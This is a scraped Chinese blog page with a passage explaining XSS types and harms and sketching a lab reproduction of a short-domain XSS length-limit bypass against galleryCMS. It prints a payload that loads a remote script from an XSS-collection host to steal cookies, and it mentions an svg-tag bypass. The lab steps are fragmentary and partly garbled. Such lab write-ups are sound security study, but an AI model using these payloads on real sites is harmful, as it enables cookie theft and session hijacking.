| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 网络协议 -> 复现20字符短域名绕过以及xss相关知识点 -> 正文阅读 |
|
[网络协议]复现20字符短域名绕过以及xss相关知识点 |
XSS简介 XSS(Cross Site Scripting):跨站脚本攻击。 XSS的原理是:攻击者在web页面中会插入一些恶意攻击的script代码。普通用户在浏览该页面的时候,此时嵌入到web页面中script代码会按照计划执行,以此达到恶意攻击用户的目的。 XSS攻击分类: XSS漏洞一般有两种类型攻击。 一类是来自内部的攻击,主要指的是利用WEB程序自身的漏洞,提交特殊的字符串,从而使得跨站页面直接存在于被攻击站点上,这个字符串被称为跨站语句。这一类攻击所利用的漏洞非常类似于SQL Injection漏洞,都是WEB程序没有对用户输入作充分的检查和过滤。 另一类则是来来自外部的攻击,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。如当我们要渗透一个站点,我们自己构造一个跨站网页放在自己的服务器上,然后通过结合其它技术,如社会工程学等,欺骗目标服务器的管理员打开。这一类攻击的威胁相对较低。 那么XSS攻击最主要有如下分类:反射型、存储型、及 DOM-based型。 反射性和DOM-baseed型可以归类为非持久性XSS攻击。存储型可以归类为持久性XSS攻击。 反射型XSS:诱使用户点击一个恶意链接,才能攻击成功,即将用户输入的数据返回给浏览器,反射型XSS也叫做“非持久型XSS” 存储型XSS:将用户输入的数据存储到服务器端,这种XSS有很强的稳定性,所以也叫做持久型XSS。比如在一个页面里植入了恶意代码,访问到这个页面的所有人的浏览器都会执行这段恶意代码。 DOM Based XSS:通过修改页面的DOM节点形成的XSS xss会造成的危害 1、网络钓鱼,包括盗取各类用户账号; 2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作; 3、劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等; 4、强制弹出广告页面、刷流量等; 5、网页挂马,进行恶意操作,例如任意篡改页面信息、删除文章等; 6、进行大量的客户端攻击,如DDoS攻击; 7、获取客户端信息,例如用户的浏览历史、真实IP、开放端口等; 8、控制受害者机器向其他网站发起攻击; 9、结合其他漏洞,如CSRF漏洞,实施进一步作恶; 10、提升用户权限,包括进一步渗透网站; 11、传播跨站脚本蠕虫等; HTML实体编码 HTML 实体是一段以连字符号( 字符实体 在 HTML 中,某些字符是预留的。在 HTML 中不能使用小于号(<)和大于号(>),这是因为浏览器会误认为它们是标签。如果希望正确地显示预留字符,我们必须在 HTML 源代码中使用字符实体 JavaScript解析 JavaScript解析过程分为两个阶段,一个是编译阶段,另外一个就是执行阶段。 编译阶段就是我们常说的JavaScript预解析(预处理)阶段,在这个阶段JavaScript解释器将完成把JavaScript脚本代码转换到字节码。在编译阶段JavaScript解释器借助执行环境把字节码生成机械码,并顺序执行 搭建galleryCMS的服务器。 3.注册galleryCMS时发现会出现问题 提示"last_ip"不能为空 解决方法:cmd进入数据库,添加"last_ip"字段,手动插入数据
? ?明可以使用js代码 为了获取到对方的cookie,尝试使用>$.getScript(“//trlsm.xss.ht”), ? 在源码当中我说。们规定的最长字符长度是:35 ? 使用< svg>标签进行一个测试。 ? 可以找到一个svg的标签,来进行绕过。
? ? ? ? ? ? |
|
网络协议 最新文章 |
使用Easyswoole 搭建简单的Websoket服务 |
常见的数据通信方式有哪些? |
Openssl 1024bit RSA算法---公私钥获取和处 |
HTTPS协议的密钥交换流程 |
《小白WEB安全入门》03. 漏洞篇 |
HttpRunner4.x 安装与使用 |
2021-07-04 |
手写RPC学习笔记 |
K8S高可用版本部署 |
mySQL计算IP地址范围 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/28 20:37:24- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |